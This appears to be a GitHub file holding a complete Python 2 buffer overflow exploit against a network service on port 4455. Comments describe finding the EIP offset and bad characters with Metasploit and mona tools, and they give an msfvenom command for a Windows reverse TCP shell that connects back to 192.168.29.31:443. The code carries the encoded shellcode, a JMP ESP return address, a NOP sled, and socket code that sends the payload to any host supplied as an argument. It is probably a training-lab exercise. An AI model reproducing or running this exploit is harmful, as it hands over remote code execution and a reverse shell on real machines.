-
Notifications
You must be signed in to change notification settings - Fork 2
/
bufferoverflowrce
52 lines (50 loc) · 2.8 KB
/
bufferoverflowrce
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#On the debugging machine, application can be crashed on port
#4455 and overwrite EIP. /usr/share/metasploit-framework/tools/exploit/pattern_create.rb is used to
#create a unique pattern, and /usr/share/metasploit-framework/tools/exploit/pattern_locate.rb to figure
#out the EIP offset. bad characters checked by putting all 256 characters after the offset in the
#buffer, and then seeing which ones didn’t show up. The 256 characters appeared in the stack. For this application
#04,a4,ef, and ba were not showing up properly in the stack. !mona modules is used to find a
#suitable .dll that wasn’t affected by any memory protection schemes. !mona find –s
#“\xff\xe4” -m dll command is used to find a suitable JMP ESP address to put in EIP. plenty of space
#past was found past the offset in the buffer, so a NOP sled was inserted followed by shellcode.
#Generate shellcode with:
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.29.31 LPORT=443 -f c -b "\x00\x04\x0a\x0d\xa4\xba\xef"
#Full exploit code
#!/usr/bin/python
import sys, socket
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <HOST>\n"
sys.exit()
shellcode = ("\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\xa0\x9b\x2c\xae\x83\xee\xfc\xe2\xf4\x5c\x73\xae\xae\xa0\x9b"
"\x4c\x27\x45\xaa\xec\xca\x2b\xcb\x1c\x25\xf2\x97\xa7\xfc\xb4"
"\x10\x5e\x86\xaf\x2c\x66\x88\x91\x64\x80\x92\xc1\xe7\x2e\x82"
"\x80\x5a\xe3\xa3\xa1\x5c\xce\x5c\xf2\xcc\xa7\xfc\xb0\x10\x66"
"\x92\x2b\xd7\x3d\xd6\x43\xd3\x2d\x7f\xf1\x10\x75\x8e\xa1\x48"
"\xa7\xe7\xb8\x78\x16\xe7\x2b\xaf\xa7\xaf\x76\xaa\xd3\x02\x61"
"\x54\x21\xaf\x67\xa3\xcc\xdb\x56\x98\x51\x56\x9b\xe6\x08\xdb"
"\x44\xc3\xa7\xf6\x84\x9a\xff\xc8\x2b\x97\x67\x25\xf8\x87\x2d"
"\x7d\x2b\x9f\xa7\xaf\x70\x12\x68\x8a\x84\xc0\x77\xcf\xf9\xc1"
"\x7d\x51\x40\xc4\x73\xf4\x2b\x89\xc7\x23\xfd\xf3\x1f\x9c\xa0"
"\x9b\x44\xd9\xd3\xa9\x73\xfa\xc8\xd7\x5b\x88\xa7\x64\xf9\x16"
"\x30\x9a\x2c\xae\x89\x5f\x78\xfe\xc8\xb2\xac\xc5\xa0\x64\xf9"
"\xfe\xf0\xcb\x7c\xee\xf0\xdb\x7c\xc6\x4a\x94\xf3\x4e\x5f\x4e"
"\xbb\xc4\xa5\xf3\xec\x06\xbd\x84\x44\xac\xa0\x9a\x97\x27\x46"
"\xf1\x3c\xf8\xf7\xf3\xb5\x0b\xd4\xfa\xd3\x7b\x25\x5b\x58\xa2"
"\x5f\xd5\x24\xdb\x4c\xf3\xdc\x1b\x02\xcd\xd3\x7b\xc8\xf8\x41"
"\xca\xa0\x12\xcf\xf9\xf7\xcc\x1d\x58\xca\x89\x75\xf8\x42\x66"
"\x4a\x69\xe4\xbf\x10\xaf\xa1\x16\x68\x8a\xb0\x5d\x2c\xea\xf4"
"\xcb\x7a\xf8\xf6\xdd\x7a\xe0\xf6\xcd\x7f\xf8\xc8\xe2\xe0\x91"
"\x26\x64\xf9\x27\x40\xd5\x7a\xe8\x5f\xab\x44\xa6\x27\x86\x4c"
"\x51\x75\x20\xdc\x1b\x02\xcd\x44\x08\x35\x26\xb1\x51\x75\xa7"
"\x2a\xd2\xaa\x1b\xd7\x4e\xd5\x9e\x97\xe9\xb3\xe9\x43\xc4\xa0"
"\xc8\xd3\x7b")
cmd = "OVRFLW "
junk = "A" * 773 + "\x83\x66\x96\x6a" + "\x90" * 8 + shellcode + "C" * 1864
end = "\r\n"
buffer = cmd + junk + end
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 4455))
s.send(buffer)
s.recv(1024)
s.close()